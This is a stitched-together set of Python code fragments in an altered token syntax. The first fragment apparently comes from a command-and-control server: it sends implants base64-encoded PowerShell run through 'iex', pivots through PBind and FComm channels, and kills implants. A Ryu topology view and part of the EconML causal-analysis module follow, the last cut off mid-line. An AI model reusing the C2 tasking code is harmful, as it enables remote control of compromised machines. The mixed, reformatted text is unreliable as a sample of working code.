os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe PBind PBind \"loadmodule%s\""%modulestr<block_end><elif_stmt>".dll"<in>module_name<block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe PBind PBind \"loadmodule%s\""%modulestr<block_end><else_stmt><block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module(module_name)<line_sep>command="run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\""%base64.b64encode(bytes(modulestr "utf-8")).decode('utf-8')<block_end><block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-command ")<block_start><try_stmt><block_start>cmd=command.replace("pbind-command " "")<line_sep>base64string=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>command="run-exe PBind PBind %s"%base64string<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-connect")<block_start>command=command.replace("pbind-connect " "run-exe PBind PBind start ")<block_end><elif_stmt>task[2].startswith("pbind-kill")<block_start>command=command.replace("pbind-kill" "run-exe PBind PBind kill-implant")<block_end><elif_stmt>task[2].startswith("fcomm-loadmodule ")<block_start><try_stmt><block_start>module_name=(task[2]).replace("fcomm-loadmodule " "")<if_stmt>".exe"<in>module_name<block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe FComm.FCClass FComm \"loadmodule%s\""%modulestr<block_end><elif_stmt>".dll"<in>module_name<block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe FComm.FCClass FComm \"loadmodule%s\""%modulestr<block_end><else_stmt><block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module(module_name)<line_sep>command="run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\""%base64.b64encode(bytes(modulestr "utf-8")).decode('utf-8')<block_end><block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("fcomm-command ")<block_start>command=command.replace("fcomm-command " "run-exe FComm.FCClass FComm ")<block_end><elif_stmt>task[2].startswith("fcomm-connect")<block_start>command=command.replace("fcomm-connect " "run-exe FComm.FCClass FComm start ")<block_end><elif_stmt>task[2].startswith("fcomm-kill")<block_start>command=command.replace("fcomm-kill" "run-exe FComm.FCClass FComm kill-implant")<block_end><elif_stmt>task[2].startswith("pbind-pivot-command ")<block_start><try_stmt><block_start>cmd=command.replace("pbind-pivot-command " "")<line_sep>base64string1=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>base64string=base64.b64encode(f"run-exe PBind PBind {base64string1}".encode("utf-8")).decode("utf-8")<line_sep>command="run-exe PBind PBind %s"%base64string<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-pivot-connect")<block_start>command=command.replace("pbind-pivot-connect " "run-exe PBind PBind run-exe PBind PBind start ")<block_end><elif_stmt>task[2].startswith("pbind-pivot-kill")<block_start>command=command.replace("pbind-pivot-kill" "run-exe PBind PBind run-exe PBind PBind kill-implant")<block_end># Uncomment to print actual commands that are being sent # if "AAAAAAAAAAAAAAAAAAAA" not in command: # print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN) command=taskIdStr+command<if_stmt>commands<block_start>commands<augadd>"!d-3dion@LD!-d"+command<block_end><else_stmt><block_start>commands<augadd>command<block_end>DB.del_newtasks(str(task[0]))<block_end><if_stmt>commands<is><not><none><block_start>multicmd="multicmd%s"%commands<block_end><try_stmt><block_start>responseVal=encrypt(EncKey multicmd)<block_end><except_stmt>Exception<as>e<block_start>responseVal=""<line_sep>print("Error encrypting value: %s"%e)<block_end>now=datetime.datetime.now()<line_sep>DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S") RandomURI)<line_sep><return>responseVal<block_end><elif_stmt>RandomURI<in>path<and><not>tasks# if there is no tasks but its a normal beacon send 200 <block_start>now=datetime.datetime.now()<line_sep>DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S") RandomURI)<line_sep><return>default_response()<block_end><block_end><block_end><block_end>
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_stmt>flask render_template request<import_stmt>view_base<class_stmt>IndexView(view_base.ViewBase)<block_start><def_stmt>__init__ self<block_start>super(IndexView self).__init__()<block_end><def_stmt>run self<block_start>host,port=request.host.split(':')<line_sep><return>render_template('topology.html' host=host port=port)<block_end><block_end>
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. """Module for assessing causal feature importance."""<import_stmt>warnings<import_from_stmt>collections OrderedDict namedtuple<import_stmt>joblib<import_stmt>lightgbm<as>lgb<import_from_stmt>numba.core.utils erase_traceback<import_stmt>numpy<as>np<import_from_stmt>numpy.lib.function_base iterable<import_stmt>pandas<as>pd<import_from_stmt>sklearn.base BaseEstimator TransformerMixin<import_from_stmt>sklearn.compose ColumnTransformer<import_from_stmt>sklearn.ensemble GradientBoostingClassifier RandomForestClassifier RandomForestRegressor<import_from_stmt>sklearn.linear_model Lasso LassoCV LogisticRegression LogisticRegressionCV<import_from_stmt>sklearn.pipeline make_pipeline Pipeline<import_from_stmt>sklearn.preprocessing OneHotEncoder PolynomialFeatures StandardScaler<import_from_stmt>sklearn.tree _tree<import_from_stmt>sklearn.utils.validation column_or_1d<import_from_stmt>...cate_interpreter SingleTreeCateInterpreter SingleTreePolicyInterpreter<import_from_stmt>...dml LinearDML CausalForestDML<import_from_stmt>...inference NormalInferenceResults<import_from_stmt>...sklearn_extensions.linear_model WeightedLasso<import_from_stmt>...sklearn_extensions.model_selection GridSearchCVList<import_from_stmt>...utilities _RegressionWrapper inverse_onehot<line_sep># TODO: this utility is documented but internal; reimplement? <import_from_stmt>sklearn.utils _safe_indexing<line_sep># TODO: this utility is even less public... <import_from_stmt>sklearn.utils _get_column_indices<class_stmt>_CausalInsightsConstants<block_start>RawFeatureNameKey='raw_name'<line_sep>EngineeredNameKey='name'<line_sep>CategoricalColumnKey='cat'<line_sep>TypeKey='type'<line_sep>PointEstimateKey='point'<line_sep>StandardErrorKey='stderr'<line_sep>ZStatKey='zstat'<line_sep>ConfidenceIntervalLowerKey='ci_lower'<line_sep>ConfidenceIntervalUpperKey='ci_upper'<line_sep>PValueKey='p_value'<line_sep>Version='version'<line_sep>CausalComputationTypeKey='causal_computation_type'<line_sep>ConfoundingIntervalKey='confounding_interval'<line_sep>ViewKey='view'<line_sep>InitArgsKey='init_args'<line_sep>RowData='row_data'# NOTE: RowData is mutually exclusive with the other data columns ALL=[RawFeatureNameKey EngineeredNameKey CategoricalColumnKey TypeKey PointEstimateKey StandardErrorKey ZStatKey ConfidenceIntervalLowerKey ConfidenceIntervalUpperKey PValueKey Version CausalComputationTypeKey ConfoundingIntervalKey ViewKey InitArgsKey RowData]<block_end><def_stmt>_get_default_shared_insights_output <block_start>""" Dictionary elements shared among all analyses. In case of breaking changes to this dictionary output, the major version of this dictionary should be updated. In case of a change to this dictionary, the minor version should be updated. """<line_sep><return>{_CausalInsightsConstants.RawFeatureNameKey:[] _CausalInsightsConstants.EngineeredNameKey:[] _CausalInsightsConstants.CategoricalColumnKey:[] _CausalInsightsConstants.TypeKey:[] _CausalInsightsConstants.Version:'1.0' _CausalInsightsConstants.CausalComputationTypeKey:"simple" _CausalInsightsConstants.ConfoundingIntervalKey:<none> _CausalInsightsConstants.InitArgsKey:{}}<block_end><def_stmt>_get_default_specific_insights view# keys should be mutually exclusive with shared keys, so that the dictionaries can be cleanly merged <block_start><return>{_CausalInsightsConstants.PointEstimateKey:[] _CausalInsightsConstants.StandardErrorKey:[] _CausalInsightsConstants.ZStatKey:[] _CausalInsightsConstants.ConfidenceIntervalLowerKey:[] _CausalInsightsConstants.ConfidenceIntervalUpperKey:[] _CausalInsightsConstants.PValueKey:[] _CausalInsightsConstants.ViewKey:view}<block_end><def_stmt>_get_metadata_causal_insights_keys <block_start><return>[_CausalInsightsConstants.Version _CausalInsightsConstants.CausalComputationTypeKey _CausalInsightsConstants.ConfoundingIntervalKey _CausalInsightsConstants.ViewKey]<block_end><def_stmt>_get_column_causal_insights_keys <block_start><return>[_CausalInsightsConstants.RawFeatureNameKey _CausalInsightsConstants.EngineeredNameKey _CausalInsightsConstants.CategoricalColumnKey _CausalInsightsConstants.TypeKey]<block_end><def_stmt>_get_data_causal_insights_keys <block_start><return>[_CausalInsightsConstants.PointEstimateKey _CausalInsightsConstants.StandardErrorKey _CausalInsightsConstants.ZStatKey _CausalInsightsConstants.ConfidenceIntervalLowerKey _CausalInsightsConstants.ConfidenceIntervalUpperKey _CausalInsightsConstants.PValueKey]<block_end><def_stmt>_first_stage_reg X y * automl=<true> random_state=<none> verbose=0<block_start><if_stmt>automl<block_start>model=GridSearchCVList([LassoCV(random_state=random_state) RandomForestRegressor(n_estimators=100 random_state=random_state min_samples_leaf=10) lgb.LGBMRegressor(num_leaves=32 random_state=random_state)] param_grid_list=[{} {'min_weight_fraction_leaf':[.001 .01 .1]} {'learning_rate':[0.1 0.3] 'max_depth':[3 5]}] cv=3 scoring='r2' verbose=verbose)<line_sep>best_est=model.fit(X y).best_estimator_<if_stmt>isinstance(best_est LassoCV)<block_start><return>Lasso(alpha=best_est.alpha_ random_state=random_state)<block_end><else_stmt><block_start><return>best_est<block_end><block_end><else_stmt><block_start>model=LassoCV(cv=5 random_state=random_state).fit(X y)<line_sep><return>Lasso(alpha=model.alpha_ random_state=random_state)<block_end><block_end><def_stmt>_first_stage_clf X y * make_regressor=<false> automl=<true> min_count=<none> random_state=<none> verbose=0# use same Cs as would be used by default by LogisticRegressionCV <block_start>cs=np.logspace(-4 4 10)<if_stmt>min_count<is><none><block_start>min_count=_CAT_LIMIT# we have at least this many instances <block_end><if_stmt>automl# NOTE: we don't use LogisticRegressionCV inside the grid search because of the nested stratification # which could affect how many times each distinct Y value needs to be present in the data <block_start>model=GridSearchCVList([LogisticRegression(max_iter=1000 random_state=random_state) RandomForestClassifier(n_estimators=100 min_samples_leaf=10 random_state=random_state) lgb.LGBMClassifier(num_leaves=32 random_state=random_state)] param_grid_list=[{'C':cs} {'max_depth':[3 <none>] 'min_weight_fraction_leaf':[.001 .01 .1]} {'learning_rate':[0.1 0.3] 'max_depth':[3 5]}] cv=min(3 min_count) scoring='neg_log_loss' verbose=verbose)<line_sep>est=model.fit(X y).best_estimator_<block_end><else_stmt><block_start>model=LogisticRegressionCV(cv=min(5 min_count) max_iter=1000 Cs=cs random_state=random_state).fit(X y)<line_sep>est=LogisticRegression(C=model.C_[0] max_iter=1000 random_state=random_state)<block_end><if_stmt>make_regressor<block_start><return>_RegressionWrapper(est)<block_end><else_stmt><block_start><return>est<block_end><block_end><def_stmt>_final_stage * random_state=<none> verbose=0<block_start><return>GridSearchCVList([WeightedLasso(random_state=random_state) RandomForestRegressor(n_estimators=100 random_state=random_state verbose=verbose)] param_grid_list=[{'alpha':[.001 .01 .1 1 10]} {'max_depth':[3 5] 'min_samples_leaf':[10 50]}] cv=3 scoring='neg_mean_squared_error' verbose=verbose)<block_end># simplification of sklearn's ColumnTransformer that encodes categoricals and passes through selected other columns # but also supports get_feature_names with expected signature <class_stmt>_ColumnTransformer(TransformerMixin)<block_start><def_stmt>__init__ self categorical passthrough<block_start>self.categorical=categorical<line_sep>self.passthrough=passthrough<block_end><def_stmt>fit self X<block_start>cat_cols=_safe_indexing(X self.categorical axis=1)<if_stmt>cat_cols.shape[1]<g>0<block_start>self.has_cats=<true><line_sep># NOTE: set handle_unknown to 'ignore' so that we don't throw at runtime if given a novel value self.one_hot_encoder=OneHotEncoder(sparse=<false> handle_unknown='ignore').fit(cat_cols)<block_end><else_stmt><block_start>self.has_cats=<false><block_end>self.d_x=X.shape[1]<line_sep><return>self<block_end><def_stmt>transform self X<block_start>rest=_safe_indexing(X self.passthrough axis=1)<if_stmt>self.has_cats<block_start>cats=self.one_hot_encoder.transform(_safe_indexing(X self.categorical axis=1))<line_sep># NOTE: we rely on the passthrough columns coming first in the concatenated X;W # when we pipeline scaling with our first stage models later, so the order here is important <return>np.hstack((rest cats))<block_end><else_stmt><block_start><return>rest<block_end><block_end><def_stmt>get_feature_names self names=<none><block_start><if_stmt>names<is><none><block_start>names=[f"x{i}"<for>i range(self.d_x)]<block_end>rest=_safe_indexing(names self.passthrough axis=0)<if_stmt>self.has_cats<block_start>cats=self.one_hot_encoder.get_feature_names(_safe_indexing(names self.categorical axis=0))<line_sep><return>np.concatenate((rest cats))<block_end><else_stmt><block_start><return>rest<block_end><block_end><block_end># Wrapper to make sure that we get a deep copy of the contents instead of clone returning an untrained copy <class_stmt>_Wrapper<block_start><def_stmt>__init__ self item<block_start>self.item=item<block_end><block_end><class_stmt>_FrozenTransformer(TransformerMixin BaseEstimator)<block_start><def_stmt>__init__ self wrapper<block_start>self.wrapper=wrapper<block_end><def_stmt>fit self X y<block_start><return>self<block_end><def_stmt>transform self X<block_start><return>self.wrapper.item.transform(X)<block_end><block_end><def_stmt>_freeze transformer<block_start><return>_FrozenTransformer(_Wrapper(transformer))<block_end># Convert python objects to (possibly nested) types that can easily be represented as literals <def_stmt>_sanitize obj<block_start><if_stmt>obj<is><none><or>isinstance(obj (bool int str float))<block_start><return>obj<block_end><elif_stmt>isinstance(obj dict)<block_start><return>{_sanitize(key):_sanitize(obj[key])<for>key obj}<block_end><else_stmt><block_start><try_stmt><block_start><return>[_sanitize(item)<for>item obj]<block_end><except_stmt>Exception<block_start><raise>ValueError(f"Could not sanitize input {obj}")<block_end><block_end><block_end># Convert SingleTreeInterpreter to a python dictionary <def_stmt>_tree_interpreter_to_dict interp features leaf_data=<lambda>t n:{}<block_start>tree=interp.tree_model_.tree_<line_sep>node_dict=interp.node_dict_<def_stmt>recurse node_id<block_start><if_stmt>tree.children_left[node_id]<eq>_tree.TREE_LEAF<block_start><return>{'leaf':<true> 'n_samples':tree.n_node_samples[node_id] **leaf_data(tree node_id node_dict)}<block_end><else_stmt><block_start><return>{'leaf':<false> 'feature':features[tree.feature[node_id]] 'threshold':tree.threshold[node_id] 'left':recurse(tree.children_left[node_id]) 'right':recurse(tree.children_right[node_id])}<block_end><block_end><return>recurse(0)<block_end><class_stmt>_PolicyOutput<block_start>""" A type encapsulating various information related to a learned policy. Attributes ---------- tree_dictionary:dict The policy tree represented as a dictionary, policy_value:float The average value of applying the recommended policy (over using the control), always_treat:dict of string to float A dictionary mapping each non-control treatment to the value of always treating with it (over control), control_name:string The name of the control treatment """<def_stmt>__init__ self tree_dictionary policy_value always_treat control_name<block_start>self.tree_dictionary=tree_dictionary<line_sep>self.policy_value=policy_value<line_sep>self.always_treat=always_treat<line_sep>self.control_name=control_name<block_end><block_end># named tuple type for storing results inside CausalAnalysis class; # must be lifted to module level to enable pickling _result=namedtuple("_result" field_names=["feature_index" "feature_name" "feature_baseline" "feature_levels" "hinds" "X_transformer" "W_transformer" "estimator" "global_inference" "treatment_value"])<def_stmt>_process_feature name feat_ind verbose categorical_inds categories heterogeneity_inds min_counts y X nuisance_models h_model random_state model_y cv mc_iters<block_start><try_stmt><block_start><if_stmt>verbose<g>0<block_start>print(f"CausalAnalysis: Feature {name}")<block_end>discrete_treatment=feat_ind<in>categorical_inds<if_stmt>discrete_treatment<block_start>cats=categories[categorical_inds.index(feat_ind)]<block_end><else_stmt><block_start>cats='auto'<block_end># just leave the setting at the default otherwise # the transformation logic here is somewhat tricky; we always need to encode the categorical columns, # whether they end up in X or in W. However, for the continuous columns, we want to scale them all # when running the first stage models, but don't want to scale the X columns when running the final model, # since then our coefficients will have odd units and our trees will also have decisions using those units. # # we achieve this by pipelining the X scaling with the Y and T models (with fixed scaling, not refitting) hinds=heterogeneity_inds[feat_ind]<line_sep>WX_transformer=ColumnTransformer([('encode' OneHotEncoder(drop='first' sparse=<false>) [ind<for>ind categorical_inds<if>ind<ne>feat_ind]) ('drop' 'drop' feat_ind)] remainder=StandardScaler())<line_sep>W_transformer=ColumnTransformer([('encode' OneHotEncoder(drop='first' sparse=<false>) [ind<for>ind categorical_inds<if>ind<ne>feat_ind<and>ind<not><in>hinds]) ('drop' 'drop' hinds) ('drop_feat' 'drop' feat_ind)] remainder=StandardScaler())<line_sep>X_cont_inds=[ind<for>ind hinds<if>ind<ne>feat_ind<and>ind<not><in>categorical_inds]<line_sep># Use _ColumnTransformer instead of ColumnTransformer so we can get feature names X_transformer=_ColumnTransformer([ind<for>ind categorical_inds<if>ind<ne>feat_ind<and>ind<in>hinds] X_cont_inds)<line_sep># Controls are all other columns of X WX=WX_transformer.fit_transform(X)<line_sep># can't use X[:, feat_ind] when X is a DataFrame T=_safe_indexing(X feat_ind axis=1)<line_sep># TODO: we can't currently handle unseen values of the feature column when getting the effect; # we might want to modify OrthoLearner (and other discrete treatment classes) # so that the user can opt-in to allowing unseen treatment values # (and return NaN or something in that case) W=W_transformer.fit_transform(X)<line_sep>X_xf=X_transformer.fit_transform(X)<line_sep># HACK: this is slightly ugly because we rely on the fact that DML passes [X;W] to the first stage models # and so we can just peel the first columns off of that combined array for rescaling in the pipeline # TODO: consider addding an API to DML that allows for better understanding of how the nuisance inputs are # built, such as model_y_feature_names, model_t_feature_names, model_y_transformer, etc., so that this # becomes a valid approach to handling this X_scaler=ColumnTransformer([('scale' StandardScaler() list(range(len(X_cont_inds))))] remainder='passthrough').fit(np.hstack([X_xf W])).named_transformers_['scale']<line_sep>X_scaler_fixed=ColumnTransformer([('scale' _freeze(X_scaler) list(range(len(X_cont_inds))))] remainder='passthrough')<if_stmt>W.shape[1]<eq>0# array checking routines don't accept 0-width arrays <block_start>W=<none><block_end><if_stmt>X_xf.shape[1]<eq>0<block_start>X_xf=<none><block_end><if_stmt>verbose<g>0<block_start>print("CausalAnalysis: performing model selection on T model")<block_end># perform model selection model_t=(_first_stage_clf(WX T automl=nuisance_models<eq>'automl' min_count=min_counts.get(feat_ind <none>) random_state=random_state verbose=verbose)<if>discrete_treatment<else>_first_stage_reg(WX T automl=nuisance_models<eq>'automl' random_state=random_state verbose=verbose))<line_sep>pipelined_model_t=Pipeline([('scale' X_scaler_fixed) ('model' model_t)])<line_sep>pipelined_model_y=Pipeline([('scale' X_scaler_fixed) ('model' model_y)])<if_stmt>X_xf<is><none><and>h_model<eq>'forest'<block_start>warnings.warn(f"Using a linear model instead of a forest model for feature '{name}' "<concat>"because forests don't support models with no heterogeneity indices")<line_sep>h_model='linear'<block_end><if_stmt>h_model<eq>'linear'<block_start>est=LinearDML(model_y=pipelined_model_y model_t=pipelined_model_t discrete_treatment=discrete_treatment fit_cate_intercept=<true> linear_first_stages=<false> categories=cats random_state=random_state cv=cv mc_iters=mc_iters)<block_end><elif_stmt>h_model<eq>'forest'<block_start>est=CausalForestDML(model_y=pipelined_model_y model_t=pipelined_model_t discrete_treatment=discrete_treatment n_estimators=4000 min_var_leaf_on_val=<true> categories=cats random_state=random_state verbose=verbose cv=cv mc_iters=mc_iters)<if_stmt>verbose<g>0<block_start>print("CausalAnalysis: tuning forest")<block_end>est.tune(y T X=X_xf W=W)<block_end><if_stmt>verbose<g>0<block_start>print("CausalAnalysis: training causal model")<block_end>est.fit(y T X=X_xf W=W cache_values=<true>)<line_sep># Prefer ate__inference to const_marginal_ate_inference(X) because it is doubly-robust and not conservative <if_stmt>h_model<eq>'forest'<and>discrete_treatment<block_start>global_inference=est.ate__inference()<block_end><else_stmt># convert to NormalInferenceResults for consistency <block_start>inf=est.const_marginal_ate_inference(X=X_xf)<line_sep>global_inference=NormalInferenceResults(d_t=inf.d_t d_y=inf.d_y pred=inf.mean_point pred_stderr=inf.stderr_mean mean_pred_stderr=<none> inf_type='ate')<block_end># Set the dictionary values shared between local and global summaries <if_stmt>discrete_treatment<block_start>cats=est.transformer.categories_[0]<line_sep>baseline=cats[est.transformer.drop_idx_[0]]<line_sep>cats=cats[np.setdiff1d(np.arange(len(cats)) est.transformer.drop_idx_[0])]<line_sep>d_t=len(cats)<line_sep>insights={_CausalInsightsConstants.TypeKey:['cat']<times>d_t _CausalInsightsConstants.RawFeatureNameKey:[name]<times>d_t _CausalInsightsConstants.CategoricalColumnKey:cats.tolist() _CausalInsightsConstants.EngineeredNameKey:[f"{name} (base={baseline}): {c}"<for>c cats]}<line_sep>treatment_value=1<block_end><else_stmt><block_start>d_t=1<line_sep>cats=["num"]<line_sep>baseline=<none><line_sep>insights={_CausalInsightsConstants.TypeKey:["num"] _CausalInsightsConstants.RawFeatureNameKey:[name] _CausalInsightsConstants.CategoricalColumnKey:[name] _CausalInsightsConstants.EngineeredNameKey:[name]}<line_sep># calculate a "typical" treatment value, using the mean of the absolute value of non-zero treatments treatment_value=np.mean(np.abs(T[T<ne>0]))<block_end>result=_result(feature_index=feat_ind feature_name=name feature_baseline=baseline feature_levels=cats hinds=hinds X_transformer=X_transformer W_transformer=W_transformer estimator=est global_inference=global_inference treatment_value=treatment_value)<line_sep><return>insights result<block_end><except_stmt>Exception<as>e<block_start><return>e<block_end><block_end># Unless we're opting into minimal cross-fitting, this is the minimum number of instances of each category # required to fit a discrete DML model _CAT_LIMIT=10<class_stmt>CausalAnalysis<block_start>""" Note: this class is experimental and the API may evolve over our next few releases. Gets causal importance of features. Parameters ---------- feature_inds: array-like of int, str, or bool The features for which to estimate causal effects, expressed as either column indices, column names, or boolean flags indicating which columns to pick categorical: array-like of int, str, or bool The features which are categorical in nature, expressed as either column indices, column names, or boolean flags indicating which columns to pick heterogeneity_inds: array-like of int, str, or bool, or None or list of array-like elements or None, default None If a 1d array, then whenever estimating a heterogeneous (local) treatment effect model, then only the features in this array will be used for heterogeneity. If a 2d array then its first dimension should be len(feature_inds) and whenever estimating a local causal effect for target feature feature_inds[i], then only features in heterogeneity_inds[i] will be used for heterogeneity. If heterogeneity_inds[i]=None, then all features are used for heterogeneity when estimating local causal effect for feature_inds[i], and likewise if heterogeneity_inds[i]=[] then no features will be used for heterogeneity. If heterogeneity_ind=None then all features are used for heterogeneity for all features, and if heterogeneity_inds=[] then no features will be. feature_names: list of str, default None The names for all of the features in the data. Not necessary if the input will be a dataframe. If None and the input is a plain numpy array, generated feature names will be ['X1', 'X2', ...]. upper_bound_on_cat_expansion: int, default 5 The maximum number of categorical values allowed, because they are expanded via one-hot encoding. If a feature has more than this many values, then a causal effect model is not fitted for that target feature and a warning flag is raised. The remainder of the models are fitted. classification: bool, default False Whether this is a classification (as opposed to regression) task TODO. Enable also multi-class classification (post-MVP) nuisance_models: one of {'linear', 'automl'}, optional (default='linear') What models to use for nuisance estimation (i.e. for estimating propensity models or models of how controls predict the outcome). If 'linear', then LassoCV (for regression) and LogisticRegressionCV (for classification) are used. If 'automl', then a kfold cross-validation and model selection is performed among several models and the best is chosen. TODO. Add other options, such as {'azure_automl', 'forests', 'boosting'} that will use particular sub-cases of models or also integrate with azure autoML. (post-MVP) heterogeneity_model: one of {'linear', 'forest'}, optional (default='linear') What type of model to use for treatment effect heterogeneity. 'linear' means that a heterogeneity model of the form theta(X)=<a, X> will be used, while 'forest' means that a forest model will be trained instead. TODO. Add other options, such as {'automl'} for performing model selection for the causal effect, or {'sparse_linear'} for using a debiased lasso. (post-MVP) categories: 'auto' or list of ('auto' or list of values), default 'auto' What categories to use for the categorical columns. If 'auto', then the categories will be inferred for all categorical columns; otherwise this argument should have as many entries as there are categorical columns, and each entry should be either 'auto' to infer the values for that column or the list of values for the column. If explicit values are provided, the first value is treated as the "control" value for that column against which other values are compared. n_jobs: int, default -1 Degree of parallelism to use when training models via joblib.Parallel verbose : int, default=0 Controls the verbosity when fitting and predicting. cv: int, cross-validation generator or an iterable, default 5 Determines the strategy for cross-fitting used when training causal models for each feature. Possible inputs for cv are: - integer, to specify the number of folds. - :term:`CV splitter` - An iterable yielding (train, test) splits as arrays of indices. For integer inputs, if the treatment is discrete :class:`~sklearn.model_selection.StratifiedKFold` is used, else, :class:`~sklearn.model_selection.KFold` is used (with a random shuffle in either case). mc_iters: int, default 3 The number of times to rerun the first stage models to reduce the variance of the causal model nuisances. skip_cat_limit_checks: bool, default False By default, categorical features need to have several instances of each category in order for a model to be fit robustly. Setting this to True will skip these checks (although at least 2 instances will always be required for linear heterogeneity models, and 4 for forest heterogeneity models even in that case). random_state : int, RandomState instance or None, default=None Controls the randomness of the estimator. The features are always randomly permuted at each split. When ``max_features < n_features``, the algorithm will select ``max_features`` at random at each split before finding the best split among them. But the best found split may vary across different runs, even if ``max_features=n_features``. That is the case, if the improvement of the criterion is identical for several splits and one split has to be selected at random. To obtain a deterministic behaviour during fitting, ``random_state`` has to be fixed to an integer. Attributes ---------- nuisance_models_: string The nuisance models setting used for the most recent call to fit heterogeneity_model: string The heterogeneity model setting used for the most recent call to fit feature_names_: list of string The list of feature names from the data in the most recent call to fit trained_feature_indices_: list of int The list of feature indices where models were trained successfully untrained_feature_indices_: list of tuple of (int, string or Exception) The list of indices that were requested but not able to be trained succesfully, along with either a reason or caught Exception for each """<def_stmt>__init__ self feature_inds categorical heterogeneity_inds=<none> feature_names=<none> classification=<false> upper_bound_on_cat_expansion=5 nuisance_models='linear' heterogeneity_model='linear' * categories='auto' n_jobs=-1 verbose=0 cv=5 mc_iters=3 skip_cat_limit_checks=<false> random_state=<none><block_start>self.feature_inds=feature_inds<line_sep>self.categorical=categorical<line_sep>self.heterogeneity_inds=heterogeneity_inds<line_sep>self.feature_names=feature_names<line_sep>self.classification=classification<line_sep>self.upper_bound_on_cat_expansion=upper_bound_on_cat_expansion<line_sep>self.nuisance_models=nuisance_models<line_sep>self.heterogeneity_model=heterogeneity_model<line_sep>self.categories=categories<line_sep>self.n_jobs=n_jobs<line_sep>self.verbose=verbose<line_sep>self.cv=cv<line_sep>self.mc_iters=mc_iters<line_sep>self.skip_cat_limit_checks=skip_cat_limit_checks<line_sep>self.random_state=random_state<block_end><def_stmt>fit self X y warm_start=<false><block_start>""" Fits global and local causal effect models for each feature in feature_inds on the data Parameters ---------- X : array-like Feature data y : array-like of shape (n,) or (n,1) Outcome. If classification=True, then y should take two values. Otherwise an error is raised that only binary classification is implemented for now. TODO. enable multi-class classification for y (post-MVP) warm_start : boolean, default False If False, train models for each feature in `feature_inds`. If True, train only models for features in `feature_inds` that had not already been trained by the previous call to `fit`, and for which neither the corresponding heterogeneity_inds, nor the automl flag have changed. If heterogeneity_inds have changed, then the final stage model of these features will be refit. If the automl flag has changed, then whole model is refit, despite the warm start flag. """<line_sep># Validate inputs <assert_stmt>self.nuisance_models<in>['automl' 'linear'] ("The only supported nuisance models are 'linear' and 'automl', "<concat>f"but was given {self.nuisance_models}")<assert_stmt>self.heterogeneity_model<in>['linear' 'forest'] ("The only supported heterogeneity models are 'linear' and 'forest' but received "<concat>f"{self.heterogeneity_model}")<assert_stmt>np.ndim(X)<eq>2 f"X must be a 2-dimensional array, but here had shape {np.shape(X)}"<assert_stmt>iterable(self.feature_inds) f"feature_inds should be array-like, but got {self.feature_inds}"<assert_stmt>iterable(self.categorical) f"categorical should be array-like, but got {self.categorical}"<assert_stmt>self.heterogeneity_inds<is><none><or>iterable(self.heterogeneity_inds) (f"heterogeneity_inds should be None or array-like, but got {self.heterogeneity_inds}")<assert_stmt>self.feature_names<is><none><or>iterable(self.feature_names) (f"feature_names should be None or array-like, but got {self.feature_names}")<assert_stmt>self.categories<eq>'auto'<or>iterable(self.categories) (f"categories should be 'auto' or array-like, but got {self.categories}")<line_sep># TODO: check compatibility of X and Y lengths <if_stmt>warm_start<block_start><if_stmt><not>hasattr(self "_results")# no previous fit, cancel warm start <block_start>warm_start=<false><block_end><elif_stmt>self._d_x<ne>X.shape[1]<block_start><raise>ValueError(f"Can't warm start: previous X had {self._d_x} columns, new X has {X.shape[1]} columns")<block_end><block_end># work with numeric feature indices, so that we can easily compare with categorical ones train_inds=_get_column_indices(X self.feature_inds)<if_stmt>len(train_inds)<eq>0<block_start><raise>ValueError("No features specified. At least one feature index must be specified so that a model can be trained.")<block_end>heterogeneity_inds=self.heterogeneity_inds<if_stmt>heterogeneity_inds<is><none><block_start>heterogeneity_inds=[<none><for>ind train_inds]<block_end># if heterogeneity_inds is 1D, repeat it <if_stmt>heterogeneity_inds<eq>[]<or>isinstance(heterogeneity_inds[0] (int str 